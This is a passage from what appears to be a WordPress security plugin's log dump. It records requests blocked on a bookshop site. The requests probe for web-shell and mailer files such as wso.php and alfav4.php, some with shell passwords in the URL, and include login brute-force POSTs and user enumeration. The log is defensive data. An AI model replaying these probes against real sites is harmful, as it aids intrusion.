Safari\\/537.36\"}','ZdYNj3ytDIVpif15nBmRuUaP',0,1636414714.8617,132,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Xb2YsL1vzEjdnUDc0CxIomH7',0,1636414715.3248,417,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','EhWSVGPNtb9Di4oFku2aMCYn',0,1636414716.0445,401,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','L5YOPa1XiUz30qfRmj2VeNcD',0,1636414716.7454,157,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/wp-content/plugins/dzs-zoomsounds/wp_mnax.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZH2znGlDkjtEiQKrecB05NVb',0,1636414717.2240,381,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/leafmailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lkpxusa85Od7HJitCYNL13Kg',0,1636414718.2008,421,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/le.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','adAUoTPZ96kb2jiumwzFNg07',0,1636414718.9176,153,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','qItEvKNfpCiV3udzx7X2cTlo',0,1636414719.3625,382,'','GET',403,0,700,0,1,'',0),('157.245.174.114',2650123890,'','https://ashbooks.co.uk/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ITo1Yhlx4VasziDqtpCPk0yd',0,1636414720.0290,386,'','GET',403,0,700,0,1,'',0),('20.65.209.30',339857694,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','0YWiwDFoO16CeR8yEMgukTmL',0,1636415484.8220,1322,'','GET',403,0,520,0,1,'',0),('20.65.209.30',339857694,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','98aRsrQ3vTJ2G0YeSBXWKPF5',0,1636415488.1674,2332,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','ti7w3uPla8oGLybBjqFempHN',0,1636418712.5575,471,'','POST',403,0,600,0,1,'',0),('69.30.240.27',1159655451,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','qL7YWUpF69Ncnbi3wmvok1A0',0,1636419442.6482,460,'','POST',403,0,600,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tvd43Ih9FyqJbMKjUkRZ2Wa6',0,1636420821.3965,430,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ur2XUdR7VTv45K8qx6kJ1ZD3',0,1636420829.4624,394,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BvYICRXhxue5M91gdQfU8Nls',0,1636420836.9364,446,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/srx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NUfxwb2zdcphEtDRJPuQmMSB',0,1636420841.8745,744,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','n7xO1FLSZdtCBza0KXugMQ4G',0,1636420860.4780,444,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/utchiha.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VeK7tjGoNwF2QUqAXanP1ph5',0,1636420870.3514,421,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Q8wUKfiHNY6RsckClSq9OgWV',0,1636420882.2457,435,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/ex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oz93ZGT4EFgQOcRyu08IA6dP',0,1636420895.9115,427,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/f6cpw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','goQIcMRw7TO2dekP4KjbsJlC',0,1636420916.7017,476,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/XxX.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','30uwUlZPCGb85ntQdrKjzcqf',0,1636420922.7829,755,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vHdiCuEFeV71Uc3DrfLISsta',0,1636420937.9276,430,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/darkshell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FWPOukezZ2QghN86EnJlvBCU',0,1636420954.7435,155,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/leafmailer2.8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sPuvEToD4x6HmJl8rLYk0aNi',0,1636420973.8859,433,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/alfav4.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','84klfvMX01TZ3ubC6nOiyFzJ',0,1636420982.3745,423,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sT2H4RlEbYUBLz3u1kiOQPF5',0,1636420989.9694,436,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-cephek.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fsnmPhRIpTq9v7zl0Mbd6C1y',0,1636421001.0780,418,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/fr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hbAtrlUiW0Eu5I1k9aCvsxB2',0,1636421008.7210,417,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/admi.php?pass=ghost287','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Az3k7QjIUqyKldWfGpXYhuiJ',0,1636421017.5523,455,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','GZTIjnso2rEDc5A9PXtSYLMd',0,1636421035.5414,172,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/classs-wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HgVmrEYfIi0Xh8MUbkuqSRvc',0,1636421041.6685,511,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/task-check.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','aSwpWQNEz4HBlqox7KU0Ziju',0,1636421050.2752,440,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/temp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','w8G0Ds2y9NhHQA4IqtXE7kgz',0,1636421059.7687,152,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/xss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N0d51q3AX89w4KOQuTlojtnB',0,1636421068.5543,436,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/ol.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gZA1Xhk6q8LoY7TrsNzxlQcF',0,1636421097.3816,407,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/werd.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RmW3LHMYoJIlSKF7681NyfGA',0,1636421104.7255,759,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/mindex22.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lWUXwEtgzAG3C9iJco01f4Du',0,1636421133.3296,940,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/mindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CxhXB8ybwQRlDUJE5T0IPmSf',0,1636421144.5991,410,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','UQPoaZcMs4FtIpm3ndTkX8u2',0,1636421153.6799,440,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-admin/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DMjVP27BJsoyTzdmHAONR1Lu',0,1636421159.1314,419,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-tomar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Q3yjih2sJtZeCIWuLHrEOSBF',0,1636421167.6070,427,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','C4JE8LTsfzMkXFH5cw6UOuRA',0,1636421173.8682,398,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-xssf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Fsa4Jly9QzWctIBNYkMVwme8',0,1636421183.3192,466,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','TgU0k3V1eKm2qwMiLsG8CfWb',0,1636421194.2876,417,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/cloudxv3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','M1GjVvmZ8i3XIPBkNH7Q2ULK',0,1636421210.4729,437,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/es.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ePXlZkrb103hTvqom8w7gafy',0,1636421217.0610,446,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/admi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Fewf0ZxgLBcy7QoXdHMlUpjE',0,1636421231.3908,453,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/Lux.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ZG6fgD0AqmR1UOhxeNaTSd9t',0,1636421243.6187,182,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/viii.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7nlwUJQ2xoVgdIYFivbtz0pj',0,1636421252.9230,412,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/anderson.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dPzwpa92RTo4QgikevZynYK3',0,1636421263.4922,394,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-configures.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','o0sxVQbKmD3EX1cv5HLflgpR',0,1636421272.4691,417,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-admin/foqsn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kPbtac0y2CsQNwBdlqWfOUA6',0,1636421276.8889,176,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-admin/readmee.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YiGaj8r9tTNwm40kpeqdM6CP',0,1636421289.5132,419,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/readmee.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DmpErgc6AfXezTHBCnobhs5i',0,1636421298.7518,540,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-admin/wp-admins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ye6QZpOoC5PxA3k1FBNvl4tu',0,1636421306.4244,413,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/px.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Ozm8vRVopbLKUHfAtDQ4ZrEc',0,1636421314.2794,476,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-admins.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VKldFrgspy7vobqPh1Ize0HC',0,1636421320.0776,427,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-tomar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ukiVljO3grXCQJWF7bfUcMsH',0,1636421331.8534,401,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/ybh35.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rJTwgMBdxLFWqkY80tsEZi2A',0,1636421337.6174,413,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','XilJISsVB1qdKFeH0NtToaQ9',0,1636421348.9279,422,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-content/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vVzJoqBcRlPOstHwfp02U6mS',0,1636421354.7316,425,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/temp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IiVz3lCTGRDZ24UrOWBdjKYF',0,1636421362.1428,434,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-admin/icryk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RJuCENXzyxjTMc1DfVK826PG',0,1636421376.3558,403,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/xss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Blu48rWEZHiIeFPXGq57Azpw',0,1636421383.7134,427,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-includes/fr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FcdT5Z0CQ3bs4aHVMik6OhxP',0,1636421401.2546,413,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-includes/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','1KGh4VMJ93O6QwrkmxlyqZpU',0,1636421411.7741,415,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-includes/xss.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','CwuhG2vPWzVn0Rkdxe1NfH7m',0,1636421416.1038,397,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/1b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YF8A4TroOjks7aEtUJlpVh9b',0,1636421422.7019,445,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/mek.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','o2AmV6LyJ1ge9OfskQtcahBX',0,1636421442.3143,470,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-cronse.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nFNhjOQpidPgwzrxIuc4ZCEy',0,1636421455.5901,481,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-cronse.php?pass=rzky0turkhack','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','zSFio0Vf3P5abJjpARLZ4KU8',0,1636421460.3762,438,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/askimet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PZhH3KW90ClmIBnbOeg2Jx1c',0,1636421466.2179,465,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-includes/askimet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4N25ntRigaS8VITsDBp9Acq1',0,1636421472.5042,461,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8nGMDBEza2sCPqNuFytf3Avk',0,1636421485.7601,425,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/ws.php?pass=ghost287','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','f51OhvZ39tsxCKVclAPoWLHn',0,1636421494.8006,142,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/nav.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MtbealJXoSK38TFrsuV9iqZD',0,1636421502.3531,439,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/nav.php?pass=ghost287','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KnCV4YxLhWwri7o68OJG2aqv',0,1636421522.5928,132,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-dashboard.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QVmHYlZMqKo5wBT2yROzbvPc',0,1636421543.5340,460,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/init.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ylFPstD6VJCdQbaxG4mXh3gY',0,1636421551.0882,418,'','GET',403,0,700,0,1,'',0),('141.94.206.147',2371800723,'','https://ashbooks.co.uk/wp-options.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) 